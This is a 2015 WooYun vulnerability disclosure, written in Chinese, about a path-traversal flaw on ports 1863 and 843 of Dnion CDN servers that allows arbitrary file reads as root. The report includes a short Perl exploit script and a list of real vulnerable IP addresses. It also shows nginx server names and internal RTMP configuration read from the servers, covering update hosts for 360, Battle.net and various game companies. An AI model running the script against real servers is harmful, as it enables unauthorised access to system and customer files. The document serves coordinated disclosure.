当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099919

漏洞标题:某cdn商服务器统一配置失误可影响腾讯360战网征途等公司

相关厂商:某cdn

漏洞作者: 杀器王子

提交时间:2015-03-06 18:38

修复时间:2015-04-20 18:40

公开时间:2015-04-20 18:40

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-06: 细节已通知厂商并且等待厂商处理中
2015-03-11: 厂商已经确认,细节仅向厂商公开
2015-03-21: 细节向核心白帽子及相关领域专家公开
2015-03-31: 细节向普通白帽子公开
2015-04-10: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

某cdn商服务器统一配置失误可影响腾讯360战网征途等公司
就目前发现的看,可影响腾讯视频、360安全卫士更新、魔兽世界更新 、征途更新、11对战平台更新、昆仑游戏更新、等等。

详细说明:

http://www.dnion.com/
帝联cdn
上海帝联信息科技股份有限公司是一家致力于专业提供互联网平台服务的高科技企业,总部位于上海,注册资金4800万。2014年12月,公司正式在新三板(全国中小企业股份转让系统)挂牌,公司证券简称:帝联科技,证券代码:831402。帝联科技依靠雄厚的资本实力、凭借敏锐的市场嗅觉和对互联网新一代业务的独特理解、利用丰富的运营经验和强大的销售力量迅速拓展互联网IDC以及CDN业务,先后在北京、广州、深圳、南通、成都、长沙等地设立了多个分公司及办事处,500多名员工,在IDC互联网数据中心、CDN内容分发网络的平台搭建、运营以及互联网增值业务拓展等方面具备丰富经验并拥有众多成功案例,综合实力居行业前列
cdn服务器的1863和843端口统一存在配置失误导致root权限的任意文件读取
下面收集了几十个ip证明。
mac的curl升级后../转义了 下来 个小脚本

#use strict;
use LWP::Simple;
$ip = $ARGV[0];
$file = $ARGV[1];
$url = "http://".$ip."/../../../../../../../..".$file;
$content=get($url);
print $content;


Snip20150306_91.png


218.92.1.168:1863
218.92.1.169:1863
218.92.1.176:1863
218.92.1.180:1863
218.92.1.182:1863
218.92.1.183:1863
58.222.24.140:1863
60.211.226.22:1863
60.211.226.23:1863
60.211.226.24:1863
60.211.226.34:1863
61.156.241.114:1863
61.156.241.120:1863
61.156.241.16:1863
61.156.241.19:1863
61.156.241.20:1863
61.156.241.22:1863
61.156.241.64:1863
61.156.241.70:1863
61.156.241.73:1863
61.156.241.74:1863
61.156.241.87:1863
61.156.241.89:1863


Snip20150306_87.png


Snip20150306_88.png


对收集到的ip进行分析 绑定的域名有

server_name wotdn.kongzhong.com;
         server_name wotpatch.kongzhong.com;
        server_name  client04.pdl.battlenet.com.cn;
        server_name  client04.pdl.wow.battlenet.com.cn;
        server_name  dlleak.360safe.com;
        server_name  dlleak2.360safe.com;
        server_name  dlleak3.360safe.com;
        server_name  dlleak4.360safe.com;
        server_name  dlleak5.360safe.com;
        server_name  dlleak6.360safe.com;
        server_name  m-enop016.dnion.com;
        server_name  sdgdown.dnion.com;
        server_name files2.changyou.com;
        server_name filesty.changyou.com;
       server_name  download1.m3guo.com;
server_name c1.qj.ztgame.com.cn;
server_name dn.apkdata.wandoujia.com;
server_name dn.mir.wandoujia.com;
server_name dn.mir.wdjcdn.com;
server_name download.5211game.com;
server_name download104.wanmei.com;
server_name downloadjs.ztgame.com.cn;
server_name efdown.5211game.com;
server_name efdown2.5211game.com;
server_name files2.changyou.com;
server_name filesty.changyou.com;
server_name ime.cdn.sogou.com;
server_name jgtmdown.5211game.com;
server_name jgtmupdate.5211game.com;
server_name jianghuupdate.ztgame.com.cn;
server_name tera.download2.kunlun.com;
server_name update.5211game.com;
server_name updatezt2jd.ztgame.com.cn;


360更新域名

Snip20150306_89.png


魔兽世界更新域名

Snip20150306_90.png

漏洞证明:

rtmp直播分发统计

pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/eventlive;
	     pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/voicelive;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/158show;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/58livev;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/5show;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/flive2;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/flive;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/gamelive;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/ishow520;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/ivp;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/live;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/live_haibian;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/quanshievent;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/show;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/ttshow;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/v1live;
             pull rtmp://hdgdwt4.dnionrtmp.com:1835/zhijilive;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/158show;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/58livev;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/5show;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/flive2;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/flive;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/gamelive;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/ishow520;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/ivp;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/live;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/live_haibian;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/quanshievent;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/show;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/ttshow;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/v1live;
             pull rtmp://hdgdwt7.dnionrtmp.com:1835/zhijilive;
             pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/gamelive;
             pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/live;
             pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/v1live;
            pull rtmp://112.65.233.185/hls;
            pull rtmp://222.73.93.58/hls;
            pull rtmp://hddxf2.dnionrtmp.com/aodiansoft;
            pull rtmp://hddxf2.dnionrtmp.com/live_audio;
            pull rtmp://hddxf2.dnionrtmp.com/live_video;
            pull rtmp://hddxf2.dnionrtmp.com/livekg;
            pull rtmp://hddxf2.dnionrtmp.com/mids;
            pull rtmp://hddxf2.dnionrtmp.com/xin189live;
            pull rtmp://hddxf2.dnionrtmp.com/zlcx;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/FMServer;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/chat;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/cpbaolive;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/cshow;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/dvrlive;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/eventlive;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/feihuosrc;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/fengyun1;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/fengyun2;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/glive;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/ktvdaren;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/live10;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/live_dnion2;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/live_dnion;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/livebfd;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/livecdn;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/livechina;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/livecpbao;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/livehslt8;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/livepkgr;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/livesk;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/livestream;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/m1905;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/moli;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/mshow;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/myapp;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/repeater;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/screenlive;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/slive live=1;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/swlive;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/video;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/videochat;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/voicelive;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/vshow  live=1; 
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/wxbgt;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/xiu8liverepeater;
            pull rtmp://hdgdwt4.dnionrtmp.com:1835/zhibo;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/FMServer;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/chat;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/cpbaolive;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/cshow;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/dvrlive;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/eventlive;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/feihuosrc;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/fengyun1;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/fengyun2;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/glive;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/ktvdaren;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/live10;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/live_dnion2;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/live_dnion;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/livebfd;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/livecdn;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/livechina;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/livecpbao;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/livehslt8;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/livepkgr;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/livesk;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/livestream;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/m1905;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/moli;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/mshow;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/myapp;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/repeater;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/screenlive;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/slive live=1;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/swlive;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/video;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/videochat;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/voicelive;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/vshow  live=1; 
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/wxbgt;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/xiu8liverepeater;
            pull rtmp://hdgdwt7.dnionrtmp.com:1835/zhibo;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/158show;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/58livev;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/5show;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/FMServer;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/chat;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/cpbaolive;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/cshow;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/dvrlive;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/feihuosrc;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/fengyun1;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/fengyun2;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/flive2;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/flive;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/glive;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/ishow520;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/ivp;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/ktvdaren;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/live10;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/live_dnion2;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/live_dnion;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/live_haibian;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livebfd;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livecdn;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livechina;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livecpbao;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livehslt8;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livepkgr;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livesk;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livestream;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/m1905;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/moli;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/mshow;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/myapp;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/quanshievent;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/repeater;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/screenlive;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/show;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/slive;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/swlive;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/ttshow;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/video;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/videochat;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/vshow  live=1;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/wxbgt;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/xiu8liverepeater;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/zhibo;
            pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/zhijilive;
            pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/aodiansoft;
            pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/live_audio;
            pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/live_video;
            pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/livekg;
            pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/livexiang;
            pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/mids;
            pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/xin189live;
            pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/yesky;
            pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/zlcx;
            pull rtmp://hdzjhzwt4.dnionrtmp.com:1835/livereach;
            pull rtmp://hdzjhzwt4.dnionrtmp.com:1835/mshowlive;
            pull rtmp://qjhywthx229.dnionrtmp.com:1835/liverepeater;
            pull rtmp://qjtjdxhx57.dnionrtmp.com:1835/liverepeater;


无法进行一一深入 仅证明漏洞

修复方案:

具体成因不明

版权声明:转载请注明来源 杀器王子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-03-11 11:35

厂商回复:

最新状态:

暂无